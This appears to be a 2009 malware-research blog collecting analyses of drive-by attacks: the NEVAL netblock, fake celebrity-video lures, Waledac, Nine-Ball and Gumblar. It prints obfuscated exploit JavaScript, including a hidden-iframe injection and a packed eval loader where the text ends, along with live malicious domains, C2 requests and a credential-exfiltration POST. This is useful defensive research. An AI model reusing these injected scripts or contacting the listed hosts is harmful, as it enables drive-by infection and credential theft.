xpl0it Analysis

91.212.198.37 Badness

2009-07-26T15:43:00.017-04:00

IP/Domain Analysis

IP address 91.212.198.37 is registered to (AS49314 NEVAL PE Nevedomskiy Alexey Alexeevich, Russia). The 91.212.198.0/24 netblock has been associated with various forms of cyber criminal activity.

inetnum: 91.212.198.0 - 91.212.198.255
netname: NEVAL
descr: Individual retailer Nevedomskiy A A
country: RU
org: ORG-IrNA1-RIPE
admin-c: NAA21-RIPE
tech-c: NAA21-RIPE
status: ASSIGNED PI
mnt-by: RIPE-NCC-END-MNT
mnt-by: NEVAL-mnt
mnt-lower: RIPE-NCC-END-MNT
mnt-routes: NEVAL-mnt
mnt-domains: NEVAL-mnt
source: RIPE # Filtered

organisation: ORG-IrNA1-RIPE
org-name: Individual retailer Nevedomskiy Alexey Alexeevich
abuse-mailbox: mailto:abuse.lirkz@gmail.com
org-type: OTHER
address: Russian Federation
mnt-ref: NEVAL-mnt
mnt-by: NEVAL-mnt
source: RIPE # Filtered

The IP 91.212.198.37 currently maps to the following domains.

• *.delzzerro.cn
• delzzerro.cn
• updatedate.cn
• www.delzzerro.cn

The domain delzzerro.cn was registered on 17 July 2009.

Domain Name: delzzerro.cn
ROID: 20090717s10001s59929740-cn
Domain Status: clientTransferProhibited
Registrant Organization: Real Host LTD
Registrant Name: Real Host
Administrative Email:
Sponsoring Registrar: 广东时代互联科技有限公司 (translated as Era of the Internet Technology Co., Ltd. Guangdong)
Name Server:ns1.everydns.net
Name Server:ns2.everydns.net
Registration Date: 2009-07-17 02:17
Expiration Date: 2010-07-17 02:17

The domain updatedate.cn was registered on 8 July 2009.

Domain Name: updatedate.cn
ROID: 20090708s10001s08910501-cn
Domain Status: clientTransferProhibited
Registrant Organization: Real Host LTD
Registrant Name: Real Host
Administrative Email:
Sponsoring Registrar: 广东时代互联科技有限公司(translated as Era of the Internet Technology Co., Ltd. Guangdong)
Name Server:ns1.everydns.net
Name Server:ns2.everydns.net
Registration Date: 2009-07-08 01:51
Expiration Date: 2010-07-08 01:51

The following websites provide historical malicious activity for AS49314, 91.212.198.0/24.

https://zeustracker.abuse.ch/monitor.php?as=49314
http://maliciousnetworks.org/ipinfo.php?as=AS49314&date=2009-07-22
http://www.malwaredomainlist.com/mdl.php?search=49314&colsearch=All&quantity=50 http://www.malwareurl.com/search.php?domain=&s=AS49314&match=0&rp=50&urls=on&redirs=on&ip=on&reverse=on&as=on

www.delzzerro.cn Analysis

The HTTP request for www.delzzerro.cn returns and iframe and script redirect.

<html>
<head><title>400</title></head>
<body>
<iframe go='400' width=1 src='/pic/p2.php' error='600' height="1"></iframe>
<div id="divid">
<script src='/pic/vq.png'></script>
</body>
</html>

http://www.delzzerro.cn/pic/p2.php

The request for p2.php returns a PDF file.

GET /pic/p2.php HTTP/1.1
Referer: http://www.delzzerro.cn/
Host: www.delzzerro.cn Connection: Keep-Alive

HTTP/1.1 200 OK
Content-Disposition: inline; filename=36.pdf
Content-Type: application/pdf

36.pdf

File: 36.pdf
Size: 27243
MD5: FDCF2B9803F7EF55C9C90BFA7627C0E9

The file 36.pdf contains exploit code targeted against 2 Adobe Reader vulnerabilities.

• Adobe util.printf, CVE-2008-2992
• Adobe getIcon, CVE-2009-0927

http://www.delzzerro.cn/pic/vq.png

The vq.png file, which was included in a script tag contains JavaScript. The .png technique is for obfuscation purposes. The JavaScript is used to exploit an Adobe Flash 0day vulnerability (CVE-2009-1862).

http://delzzerro.cn/pic/uzp.php

The payload of the collective exploits is a GET request for uzp.php which returns the binary file installb.exe.

GET /pic/uzp.php
Host: delzzerro.cn

HTTP/1.1 200 OK
Content-Disposition: inline; filename=installb.exe
Content-Type: application/octet-stream

http://91.212.198.37 Analysis

The HTTP request for 91.212.198.37 returns and iframe, script redirect and exploit code.

<html>
<head><title>404</title></head>
<body>
<iframe g='22' width=1 src='/img/p2.php' l='66' height="1"></iframe>
<script>
fg="%u2121%..;var .%u212.DE%u.1%u.%u.navigat.retVal.ibkka.var ..DE.=..return .5.C9E2.C9.0..C9.u..71.21.functio.A22.29.';.U+.+'.
......TRUNCATED......
split('.');for(J=u.length-1;J>-1;J--)Q[U]=Q[U].split(o[J]).join(u[J]);i8+=Q[U].replace(/./g,'"').replace(/./g,"\\").replace(/./g,"\n")}eval(i8);
</script>
<div id="divid">
<script src='/img/vw.png'></script>
</body>
</html>

http://91.212.198.37/img/p2.php

The request for p2.php returns a PDF file.

GET /img/p2.php
Referer: http://91.212.198.37/
Host: 91.212.198.37

HTTP/1.1 200 OK
Content-Disposition: inline; filename=119.pdf
Content-Type: application/pdf

119.pdf

File: 119.pdf
Size: 27360
MD5: 26A360E37812E6D5CCF31ED06CE692D9

The file 119.pdf contains exploit code targeted against 2 Adobe Reader vulnerabilities.

• Adobe util.printf, CVE-2008-2992
• Adobe getIcon, CVE-2009-0927

http://91.212.198.37/img/vw.png

The vw.png file, which was included in a script tag contains JavaScript. The .png technique is for obfuscation purposes. The JavaScript is used to exploit an Adobe Flash 0day vulnerability (CVE-2009-1862).

updatedate.cn/img/uzt.php

The payload of the collective exploits is a GET request for uzt.php which returns the binary file installb.exe.

GET /img/uzt.php
Host: updatedate.cn

HTTP/1.1 200
Content-Disposition: inline; filename=installb.exe
Content-Type: application/octet-stream

Malware Analysis

installb.exe

The malware installb.exe creates:

• Trojan.Virantix.C (Symantec) which attempts to lower system security settings, kill the process of antivirus applications and install rogue security products.
• PWS:Win32/Daurso (Microsoft) serves as an infostealer that keylogs and exfiltrates user accounts and passwords.

File: installb.exe
Size: 113664
MD5: D9A878871B90C68F4A1A155A3015A8FE

ThreatExpert
VirusTotal (4/41 current detection)

The malware installb.exe creates the following files:

C:\DOCUME~1\%user%\LOCALS~1\Temp\installb[1].exe

File: installb[1].exe
Size: 48128
MD5: 9145DA932AAB97CF50B5DE8DCDF80BE9

C:\WINDOWS\system32\braviax.exe

File: braviax.exe
Size: 11264
MD5: 61FEBE4C32CE9CB0DFCF55D373E0BAFD

VirusTotal (17/41 current detection)

C:\WINDOWS\system32\dllcache\figaro.sys (is later deleted)

C:\WINDOWS\drivers\beep.sys
C:\WINDOWS\system32\dllcache\beep.sys

File: beep.sys
Size: 32768
MD5: B040B5812B6668A232B18D397F721741

VirusTotal (20/38 current detection)

C:\WINDOWS\system32\Wbem\proquota.exe

File: proquota.exe
Size: 35840
MD5: 348BA619AAB3A92B99701335F95FE2A7

ThreatExpert
VirusTotal (5/41 current detection)

proquota.exe (PWS:Win32/Daurso)

The malware proquota.exe (PWS:Win32/Daurso) connects to squatead.com (212.150184.146, AS8584 Barak Netvision 013 Barak – Network, Israel).

POST /ptf/receiver/online HTTP/1.1
Host: squatead.com

The malware proquota.exe monitored and exfiltrated FTP credentials to squatead.com during dynamic analysis.

POST /ptf/receiver/ftp HTTP/1.1
Host: squatead.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Opera/9.63 (Windows NT 5.1; U; ru) Presto/2.1.1
Content-Length: 92
ftp_uri_0=p7uojZW2GGxfm637v7nEye4CbV7Y5%2FKP6Y6It1wqCsfk%2BeHqgYCrXA&ftp_source_0=lb250dzwDg

Trojan.Virantix.C

The Trojan.Virantix.C malware connects to komalinovskatas.com (66.79.178.199, AS27645 ASN-NA-MSG-01 Managed Solutions Group, Inc) in order to download the installer for the rogue security product Home Antivirus 2010. The domain komalinovskatas.com was registered on 2009/7/20.

Registrant:
Aleksandr Petrov mailto:radar@e2mail.ru +7.3412755886
Aleksandr Petrov
ul.Udmurtskaya d.141 kv.110
Izhevsk,Udmurtiya,RUSSIAN FEDERATION 426003

Domain Name:komalinovskatas.com
Record last updated at 2009-07-23 10:32:26
Record created on 2009/7/20
Record expired on 2010/7/20

Home Antivirus 2010 installer download.

GET /?wmid=1025&d=2&it=2&s=24 HTTP/1.1
Host: komalinovskatas.com

HTTP/1.1 302 Found
Location: /2/installer/Installer.exe?u=1025&s=b4eaa65e579e83c2248376cc88de9086&t=2

GET /2/installer/Installer.exe?u=1025&s=b4eaa65e579e83c2248376cc88de9086&t=2 HTTP/1.1
Host: komalinovskatas.com

HTTP/1.1 200 OK
Content-Disposition: attachment; filename="Install.exe";

The malware install.exe is written as c:\WINDOWS\system32\wisdstr.exe.

File: wisdstr.exe
Size: 181488
MD5: E68A91A3614435882DAAD5494CAE622E

ThreatExpert

The malware wisdstr.exe connects to bureltanovaderta.com (66.79.178.200, AS27645 ASN-NA-MSG-01 Managed Solutions Group, Inc) to download the remaining installation files associated with the rogue security product Home Antivirus 2010. The product provides false diagnostics and persistent notifications in an attempt to convince the victim to purchase a licensed version of the product.

GET /files/HomeAntivirus2010/Binaries1.cab HTTP/1.1
GET /files/HomeAntivirus2010/Binaries1.cab HTTP/1.1
GET /files/BinariesAVE.cab HTTP/1.1
GET /files/BinariesAVE.cab HTTP/1.1
GET /files/BinariesAdd.cab HTTP/1.1
GET /files/HomeAntivirus2010/BinariesGUI.cab HTTP/1.1
GET /files/BinariesSC.cab HTTP/1.1
GET /files/BinariesUpd.cab HTTP/1.1
GET / HTTP/1.1
GET /update_inst.php?wmid=1025&subid=b4eaa65e579e83c2248376cc88de9086&pid=2&lid=0&hs=F35A291E6CA636316E72ECAD75594619 HTTP/1.1

The domain bureltanovaderta.com is registered nearly identical to komalinovskatas.com.

Registrant:
Aleksandr Petrov radar@e2mail.ru +7.3412755886
Aleksandr Petrov
ul.Udmurtskaya d.141 kv.110
Izhevsk,Udmurtiya,RUSSIAN FEDERATION 426003

Domain Name:bureltanovaderta.com
Record last updated at 2009-07-24 10:06:32
Record created on 2009/7/20
Record expired on 2010/7/20

An over-sized Windows Security center opens indicating Virus Protection is not found. The window is part of the social; engineering effort to convince victims to purchase a licensed version of Home Antivirus 2010.

The malware also attempted C2 connections to cbbugltjud.com (195.2.253.240, AS12695 MADET-NET Moscow, Russia) to download additional malware. Other domains that resolve to 195.2.253.240 include:

*.cabkyykbbg.com
*.cbbugltjud.com
cabkyykbbg.com
cbbugltjud.com
www.cabkyykbbg.com
www.cbbugltjud.com

GET /progs/xfcgtyylqd/iejwn
Host: cbbugltjud.com

The iejwn download creates c:\alurm.exe.

File: alurm.exe
Size: 11264
MD5: 6BE4585C480B5C840E99BE9B190F7846

ThreatExpert

GET /progs/xfcgtyylqd/ziwwofwj.php
Host: cbbugltjud.com

GET /progs/xfcgtyylqd/czaarfj.php?adv=adv464
Host: cbbugltjud.com

Erin Andrews Peepshow Gone Bad?

2009-07-21T22:24:00.010-04:00

Fox News and other media outlets are reporting ESPN sportscaster hottie Erin Andrews was a victim of a severe invasion of privacy. Per Fox News, "Sexy ESPN sportscaster Erin Andrews was the target of a peephole pervert who surreptitiously shot a video of her walking around her hotel room naked -- and posted it on the Internet."

So what happens next? Tons of people search for the video before it is pulled by authorities and cyber criminals race to put up rogue exploit sites tied to common internet searches. As an example, the Google search for "Erin Andrews video nude" results in a hit for http://digg.com/celebrity/Naked_Erin_Andrews_SEX_TAPE_online_free.

The digg.com link had comments with hyperlinks to the following sites (note: the sites seem to consistently change)

http://video.report-cnn.com/Erin_Andrews_Peephole_Video (7/20/09)
http://sexy-top-news.com/show.php?id=Erin_Andrews (7/21/09)
http://vsj-news.com/video.php?vid=erin_andrews_peephole_video (7/21/09)

So lets follow the links to see the video :)

video.report-cnn.com (72.232.116.51)

Wow, CNN Video has the video!

All I need to do is download this Live Video Player!

MediaPlayer.exe seems legitimate.

No movie :( - what happened???

The file MediaPlayer.exe was downloaded from simplexdoom.com (91.214.45.73).

GET: http://simplexdoom.com/download/395a695151773d3df7992c7620090715/MediaPlayer.exe
Referer: http://mediaplayer.4upd.com/Products/update_seven_win/-6478-332-34-en-hq-/mediatube.swf?clip=Erin Andrews Peephole Video

File: MediaPlayer.exe
Size: 86715
MD5: 9D05428AE376A369798B126358B74150

Per ThreatExpert, MediaPlayer.exe installs several Alueron malware components. Per CA, "Alueron is a family of trojans with a variety of components that can download and execute arbitrary files, hijack the browser to display fake web pages, and report affected user's queries performed with popular search engines."

During analysis, the Alueron malware made the following C2 connections.

POST /generator.php HTTP/1.0
Host: 91.214.45.73

POST /adc.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 91.214.45.73

Let's try again, it has to be out there.

vsj-news.com (174.36.240.140)

VSJ News has to have the video. All I need is a Flash video codec plugin!

FlashCodecPlugin.exe looks good!

No movie again :(

The file FlashCodecPlugin.exe was downloaded from bigdron.com (91.214.45.73).

GET http:///bigdron.com/download/6936413148673d3d4ae1782e20090701/FlashCodecPlugin.exe
Referer: http://vsj-news.com/video.php?vid=erin_andrews_peephole_video

File: FlashCodecPlugin.exe
Size: 88514
MD5: 87CFCC91FB9934E55D3C969997D2BDC1

Per ThreatExpert, FlashCodecPlugin.exe also installs several Alueron malware components.

The FlashCodecPlugin.exe Alueron malware also connects to the same C2 sites.

POST /generator.php HTTP/1.0
Host: 91.214.45.73

POST /adc.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 91.214.45.73

Well, so much for the video. Let's examine some of the domains and IP addresses associated with the Alueron malware.

Domain/IP Analysis

report-cnn.com [hosts fake video requiring codec] currently resolves to 72.232.116.51 (AS22576, Layered Technologies, US). Several other suspect domains currently resolve to 72.232.116.51:

bestcasinochat.com
bestcasinogroup.com
bestworldwidecasino.com
casinogametime.net
cavers.net
celeb-sextapes.info
chudnoj.com
darkblog.org
eblogic.com
extraspray.com
fashionclubcasino.net
ffssa.com
finadvisenow.com
finquotenow.com
flplace.com
freepornsearcher.net
freesexsearcher.net
inacall.com
kittyclubcasino.com
lenma.com
mediaplayer.4upd.com
medicalc.net
mifomatic.com
mortagequotenow.com
oops-boobs.com
pornomixer.ru
report-cnn.com
rosem.biz
sexy-babes-zone.com
sleepingbabe.info
smut-xxx.com
totalautoblog.com
truetrick.net
video.report-cnn.com
webartcreative.com
www.chudnoj.com
www.free-incest-movies.net
www.pornomixer.ru
www.sleepingbabe.info
www.xesdn.ru
x-light.info
xesdn.ru

simplexdoom.com [fake codec malware download site] currently resolves to 91.214.45.73 (AS44042, eSolutions, Belize). Several other suspect domains currently resolve to 91.214.45.73:

*.allincorx.com
*.bigdron.com
*.cikaredo.com
*.operationelx.com
*.oxxadox.com
*.paxxtiger.com
*.rstdeals.com
*.simplexdoom.com
allincorx.com
bigdron.com
cikaredo.com
detailedus.com
ns1.allincorx.com
ns1.bigdron.com
ns1.cikaredo.com
ns1.operationelx.com
ns1.oxxadox.com
ns1.paxxtiger.com
ns1.rstdeals.com
ns1.simplexdoom.com
ns2.allincorx.com
ns2.bigdron.com
ns2.cikaredo.com
ns2.operationelx.com
ns2.oxxadox.com
ns2.paxxtiger.com
ns2.rstdeals.com
ns2.simplexdoom.com
operationelx.com
oxxadox.com
paxxtiger.com
rstdeals.com
simplexdoom.com

vsj-news.com [hosts fake video requiring codec] currently resolves to 174.36.240.140 (AS36351, SOFTLAYER Technologies Inc., US). Several other suspect domains currently resolve to 174.36.240.140:

24kadra.net
avado.ru
bestdom2.ru
domivo4ka.com
gliant.com
kontaktzlo.ru
kozenko.ru
kurortnik.com.ua
livedom2.ru
simpletv.net
softlayer.org.ru
svet999.ru
vsj-news.com
wmsoft.ru
www.24kadra.net
www.bestdom2.ru
www.kurortnik.com.ua
www.livedom2.ru
www.simpletv.net
www.svet999.ru
ylati.ru

sexy-top-news.com [listed at digg.com, but down at the time of analysis] currently resolves to 195.88.191.21 (AS22576, Bigness Group Ltd., Russia). Several other suspect domains currently resolve to 195.88.191.21:

empire-of-tops.com
sexy-top-news.com
shocking-stars.net
video-trailers.net

Bottom line: social engineering tactics surrounding current events and pornographic material continue to be a preferred TTP for cyber criminals. There is no need to come up with exploit code, when users continue to "choose" to install malware themselves.

Waledac - July 4th Wave

2009-07-08T19:10:00.004-04:00

Keeping up with theme-based spam, Waledac began a new wave for the 4th of July. Shadowserver posted a list of 4th of July themed domains like the following:

fireworksholiday.com
freeindependence.com
happyindependence.com
holidayfirework.com

The TTP was the standard spam, fake YouTube video and executable download. A sample Waledac spam email hyperlink is for wpyn.fireholiday.com/video.exe. The domain wpyn.fireholiday.com resolves to numerous Fast Flux IP addresses. A quick resolution of the first 50 nodes is below:

112.76.132.115
118.232.163.47
118.34.184.174
124.123.15.55
200.114.156.47
200.75.122.114
200.8.236.97
201.213.101.148
201.75.55.113
204.19.202.167
213.106.51.95
213.63.244.54
213.89.177.19
217.132.89.78
24.56.242.144
24.88.106.240
60.2.41.179
60.244.160.18
61.35.161.29
69.86.53.176
71.12.11.2
71.137.1.103
71.17.123.33
71.230.75.255
77.37.144.56
81.97.199.10
82.1.200.141
82.67.81.223
83.233.163.135
83.233.18.128
84.108.85.123
84.109.209.107
85.201.139.159
85.230.122.138
86.123.150.156
87.116.182.176
88.163.104.87
88.169.133.14
89.136.112.46
89.215.93.163
89.34.67.226
89.74.183.203
89.76.121.249
89.76.52.152
92.53.34.101
92.53.34.101
93.100.87.113
97.89.139.5
98.239.10.9
98.246.19.23

sudosecure.net provides a cool tracking mechanism for Waledac binaries, Fast Flux IP addresses and domains.

Malware Analysis

File: video.exe
Size: 630784
MD5: 1D36E772F9892B64D810978B9A99541E

The Waledac malware video.exe creates a registry key referencing where the file was executed from. In this example, the file was executed from the desktop.

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion "RList"
Type: REG_BINARY
Data: (data too large: 6944 bytes)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "PromoReg"
Type: REG_SZ
Data: C:\Documents and Settings\%User Profile%\Desktop\video.exe

The following are samples of initial connections to various Waledac controllers.

POST /rbbcrx.png
Host: 119.77.219.219

POST /lbohwj.png
Host: 98.25.97.68

POST / HTTP/1.1
Host: 93.100.114.158

POST /xdryoc.htm
Host: 134.155.241.188

POST /mzrbflwkczf.png
Host: 93.100.114.158

Nine-Ball Analysis

2009-06-19T23:21:00.016-04:00

On 16 June 2009, Websense released an Alert concerning the latest drive-by web exploit dubbed Nine-Ball. Per Websense, “We have been tracking the Nine-Ball mass compromise since 6/03/2009. To date, over 40,000 legitimate Web sites have been compromised with obfuscated code that leads to a multi-level redirection attack, ending in a series of drive-by exploits that if successful install a trojan downloader on the user's machine.” The name Nine-Ball came from the final landing exploit site destination after a series of redirects:

rnw.kz > bro.tw > rmi.tw > ninetoraq.in

Further investigation reveals there are numerous landing exploit sites which dynamically change each time a victim host is redirected. Multiple connections from the same source IP address result in a redirect to the benign site ask.com. The exploit code on the landing site also appears to vary with each site.

The following is sample redirect/exploit path followed from the base redirect rnw.kz/index.php

Exploit Analysis

http://rnw.kz/index.php
|-->HTTP 302 location redirect to http://bro.tw/in.cgi?3
|---->meta http-equiv refresh redirect to http://rmi.tw/in.cgi?6
|------> HTTP 302 location and meta http-equiv refresh redirect to http://mias.tw/1/index.php

All of the sites are hosted at 91.212.65.133 (Eurohost LLC, AS48841, Ukraine)

The sites bro.tw and rmi.tw appear to utilize cookies to track visitor requests. Multiple requests result in a redirect to the landing site http://ask.com.

The site http://mias.tw/1/index.php returns obfuscated JavaScript that decodes to reveal an EMBED tag that references pdf.php.

function FVEopW91F0QKb(){
var Qqz8W8MiQQlAc = false;
try {
if (navigator.plugins && navigator.mimeTypes.length){
for (var apjVVQ1jEqGNq = 0; apjVVQ1jEqGNq < navigator.plugins.length; apjVVQ1jEqGNq
++ ){
var iWHp9Og8VDFsw = navigator.plugins[apjVVQ1jEqGNq].name;
if (iWHp9Og8VDFsw.indexOf("Adobe Acrobat") != - 1){
Qqz8W8MiQQlAc = true;
break ;
}
}
}
}
catch (e){
}
if (Qqz8W8MiQQlAc){
document.write(
'<EMBED SRC="pdf.php" WIDTH="36" HEIGHT="14" TYPE="application/pdf" /></EMBED>');
}
else return false;
}
setTimeout("FVEopW91F0QKb();", 500);

The file pdf.php request returned a PDF file named What_is_Unique_Pack.pdf. The filename refers to the unique Pack exploit toolkit discussed by Finjan.

File: What_is_Unique_Pack.pdf
Size: 15139
MD5: 2C8144C3927A33598FEBFFBFC61B6EA9

The PDF file meta data indicates it was created June 6, 2009 using Nitro PDF Professional 6.0 and print driver BCL easyPDF 6.00.20.

/Creator (NitroPDF 6.0)
/Producer (BCL easyPDF 6.00.20)
/ModDate (D:20090606123256+02'00')
/CreationDate (D:20090606123026+03'00')

The PDF contains obfuscated JavaScript that decodes to reveal 3 exploits targeted against Adobe Reader vulnerabilities.

• Adobe util.printf overflow vulnerability (CVE-2008-2992, APSB08-19)
• Collab.collectEmailInfo()JavaScript Method Remote Code Execution Vulnerability (CVE-2007-5659, APSB08-13)
• Collab.getIcon() JavaScript Method Remote Code Execution Vulnerability (CVE-2009-0927, APSB09-04)

All of the exploits result in the GET request for http://mias.tw/1/getexe.php downloaded as load.exe.

Malware Analysis

The malware load.exe creates mscorewr.dll, which Microsoft detects as Win32/Silentbanker.B. As of 2009.06.20 02:30:08 (UTC) only 2/41 antivirus vendors detect the malware.

ThreatExpert
VirusTotal

File: load.exe
Size: 69632
MD5: 801EFE85BEF379E50B882F7B5846DB7A

The malware load.exe creates the following file and registry entries.

c:\WINDOWS\system32\mscorewr.dll

File: mscorewr.dll
Size: 86016
MD5: 33C03C3768610765A06CB112CABAA00A

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{00009E9F-DDD7-AA59-AA7D-AA4B7D6BE000}
HKEY_CLASSES_ROOT\CLSID\{00009E9F-DDD7-AA59-AA7D-AA4B7D6BE000} "(Default)"
Type: REG_SZ
Data: mscorewr
HKEY_CLASSES_ROOT\CLSID\{00009E9F-DDD7-AA59-AA7D-AA4B7D6BE000}\InprocServer32 "(Default)"
Type: REG_SZ
Data: C:\WINDOWS\System32\mscorewr.dll
HKEY_CLASSES_ROOT\CLSID\{00009E9F-DDD7-AA59-AA7D-AA4B7D6BE000}\InprocServer32 "ThreadingModel"
Type: REG_SZ
Data: Apartment
HKEY_CLASSES_ROOT\CLSID\{00009E9F-DDD7-AA59-AA7D-AA4B7D6BE000}\TypeLib "(Default)"
Type: REG_SZ
Data:

Domain/IP Analysis

The 3 initial redirect domains rnw.kz, bro.tw, and rmi.tw resolve to 91.212.65.133 (Eurohost LLC, AS48841, Ukraine). The following domains also currently resolve to 91.212.65.133.

bmt.tw
bro.tw
mail.bro.tw
mail.nikodomain.info
molo.tw
nikodomain.info
ns1.dmdnssrv.info
orep.tw
rmi.tw
rnw.kz
sovi.tw
mias.tw

The below table lists domain registration data for the domains hosted at 91.212.65.133:

Domain Registration Provider Registration Date Registrant Country
mias.tw WebCC Ltd. 2009-06-15 RU
bmt.tw WebCC Ltd. 2009-05-17 RU
bro.tw WebCC Ltd. 2009-06-03 RU
molo.tw WebCC Ltd. 2009-06-09 RU
orep.tw WebCC Ltd. 2009-06-15 RU
rmi.tw WebCC Ltd. 2009-06-12 RU
sovi.tw WebCC Ltd. 2009-06-12 RU
rnw.kz SKILLTEX 2009-05-18 RU

Redirect testing identified the exploit landing site rotated between several sites. The following sites were observed in addition to the aforementioned http://mias.tw/1/index.php. Each of the exploit landing sites used different obfuscation techniques, exploits and payload downloads.

http://my-bilderrahmen.cn/e/t.php (85.17.200.207, NL)
http://adultfex.com/lb/index.php (209.160.72.174, US)
http://www.1w90.co.cc/1/index.php (213.182.197.251, LV)
http://pendu1um.cn/cp/index.php (61.235.117.85, CN)
http://orep.tw/pve/ (91.212.65.133, RU)
http://stopssse.info/l.php?pbr (66.199.237.127, US)

On 22 June 2009, ScanSafe called out Websense's reporting numbers and stated Nine-Ball was a bunch of hype. Let the firewoks begin...

Gumblar Analysis

2009-06-11T20:18:00.011-04:00

So it seems Gumblar is the latest threat to receive continual media hype. It was nice to see Symantec's opinion that this is just another day in the life of the web. Recent "threats" like Conficker and Gumblar seem to benefit security vendors and consultants who feed the hype for business purposes. The term Gumblar is an adopted term that describes a recent web-based drive-by attack. The attack follows the standard web-based drive-by attack TTP:

The bad guys use stolen FTP credentials or SQL injection to inject iframe redirects into legitimate websites.
The iframes redirect to sites that host exploit code targteted against web browsers, browser plug-ins and 3rd party applications (IE, FF, Adobe Reader, WinZip, etc.)
The exploits result in malware payload. The malware typically downloads additional for-profit malware (spambots, infostealers, rogue security products, etc.)
Credentials exfiltrated by infostealers (like FTP) are used to compromise additional web servers back in step #1.

At one point in the attack (~May 2009), the Gumblar exploit site was gumblar.cn (hence the adopted name). The domain martuz.cn was later used. The activity began much further back, but the attack summary was put togther and publicized more recently. The following "Gumblar" analysis goes back to April 17, 2009 before gumbar.cn was utilized.

Gumbar Exploit Analysis

The USDA Forest Service website (http://www.fs.fed.us) was a vicitm of an iframe injection. The compromised site contained an iframe to lotmachinesguide.cn (94.247.3.150, Latvia).

<iframe src="http://lotmachinesguide.cn/in.cgi?income56" width=1 height=1 style="visibility: hidden"></iframe>

The lotmachinesguide.cn/in.cgi?income56 request returned a HTTP Location redirect to liteautogreatest.cn (94.247.3.151, Latvia). The http://liteautogreatest.cn/index.php request returned obfuscated JavaScript and references to Adobe Reader and Flash files that contain exploit code.

http://liteautogreatest.cn/cache/readme.pdf
http://liteautogreatest.cn/cache/flash.swf

The first 2 sections of exploit code target the Microsoft Access Snapshot Viewer ActiveX Control Vulnerability (CVE-2008-2463, MS08-041). The readme.pdf file contains code designed to exploit the Adobe util.printf overflow vulnerability (CVE-2008-2992, APSB08-19) and a vulnerability in the JavaScript method Collab.collectEmailInfo() in Adobe PDF Reader’s JavaScript Engine (CVE-2007-5659, APSB08-13). The flash.swf file exploits an Adobe Flash vulnerability (not sure specific one).The exploit payloads were GET requests to litehitscar.cn (94.247.3.151, Latvia) that returned load.exe.

http://litehitscar.cn/load.php?id=1
http://litehitscar.cn/load.php?id=4
http://litehitscar.cn/load.php?id=5

http://liteautogreatest.cn/index.php Code

<script>eval(function(l,a,z,k,e,d){e=function(z){return(z<a?'':e(parseInt(z/a)))+((z=z%a)>35?String.fromCharCode(z+29):z.toString(36))};while(z--){if(k[z]){l=l.replace(new RegExp('\\b'+e(z)+'\\b','g'),k[z])}}return l}('1h(1i(\'%E%J%l%o%h%k%p%l%0%V%l%E%10%h%L%B%E%w%1%2%d%c%I%d%c%g%E%p%9%1%j%P%D%9%11%j%M%P%w%0%t%0%15%F%0%z%q%s%A%A%G%w%D%H%0%t%0%x%x%u%0%j%P%D%9%11%j%M%P%w%0%1g%t%0%15%13%u%0%j%P%D%9%11%j%M%P%w%y%y%2%d%c%g%I%d%c%g%g%z%q%s%A%A%G%w%D%H%0%t%0%X%h%9%k%l%s%r%E%9%p%O%B%q%i%9%B%p%C%8%1%13%A%0%y%0%j%P%D%9%11%j%M%P%w%2%u%d%c%g%g%z%i%9%0%C%H%w%B%12%G%q%C%Z%0%t%0%l%8%L%0%19%O%i%s%8%1%2%u%d%c%g%g%C%H%w%B%12%G%q%C%Z%r%v%9%o%0%t%0%x%9%8%v%W%n%n%x%0%y%0%z%q%s%A%A%G%w%D%H%0%y%0%x%W%6%6%x%0%y%0%f%R%a%7%1%2%9%1%e%p%2%e%s%5%9%1%a%i%7%O%e%4%0%2%10%b%k%4%m%e%a%2%8%1%v%b%e%e%f%r%9%8%j%m%i%o%8%1%n%5%3%a%3%b%3%6%4%3%6%7%3%6%2%3%6%e%3%6%1%n%k%s%F%0%f%f%2%0%y%0%x%6%6%x%0%y%0%f%D%7%J%1%4%a%h%e%7%m%2%1%a%p%1%p%a%a%a%Y%a%2%0%7%5%a%1c%a%1%5%4%V%4%a%j%7%4%9%4%5%8%a%1%v%2%7%v%5%4%f%r%9%8%j%m%i%o%8%1%n%a%3%b%3%5%3%6%7%3%6%1%3%6%4%3%6%e%3%6%2%n%k%s%F%0%f%f%2%0%y%0%x%6%6%x%0%y%0%f%O%5%2%v%e%p%2%8%a%7%1%9%1%8%2%e%4%v%5%b%7%5%r%2%b%b%b%C%b%5%4%b%m%4%e%5%m%1%4%f%r%9%8%j%m%i%o%8%1%n%b%3%6%4%3%6%e%3%6%1%3%a%3%6%2%3%5%3%6%7%n%k%s%F%0%f%f%2%0%y%0%x%n%b%15%n%17%x%u%d%c%d%c%g%g%k%E%1%C%H%w%B%12%G%q%C%Z%r%q%8%k%s%q%h%0%t%t%0%A%1m%2%d%c%g%g%I%d%c%g%g%g%14%9%8%i%Y%u%d%c%g%g%K%d%c%d%c%g%g%C%H%w%B%12%G%q%C%Z%0%t%0%f%f%u%d%c%g%K%d%c%d%c%g%9%8%h%J%9%l%0%z%q%s%A%A%G%w%D%H%u%d%c%K%d%c%d%c%E%J%l%o%h%k%p%l%0%m%9%o%1a%O%M%N%1b%k%1%J%9%m%2%d%c%I%d%c%g%z%i%9%0%z%q%s%A%A%G%w%D%H%0%t%0%V%l%E%10%h%L%B%E%w%1%2%u%d%c%g%k%E%0%1%z%q%s%A%A%G%w%D%H%0%t%t%0%f%1f%f%2%0%9%8%h%J%9%l%u%d%c%d%c%g%h%9%M%d%c%g%I%d%c%g%g%z%i%9%0%j%N%B%U%T%S%Q%l%0%t%0%l%8%L%0%18%o%h%k%z%8%Z%D%14%1d%8%o%h%1%f%v%e%5%l%1%e%a%j%a%z%4%1%L%7%b%a%7%r%e%5%5%a%X%4%5%7%7%l%5%5%7%2%i%4%1%e%j%7%a%5%b%7%v%b%b%7%q%2%b%p%a%7%4%h%4%2%0%5%2%1l%7%1%4%5%k%4%a%8%5%5%L%7%8%a%4%7%9%1%4%1%7%0%a%7%e%2%B%4%a%p%2%l%7%b%4%e%h%4%b%9%7%5%4%p%4%m%5%2%4%r%5%b%7%5%17%a%b%2%f%r%9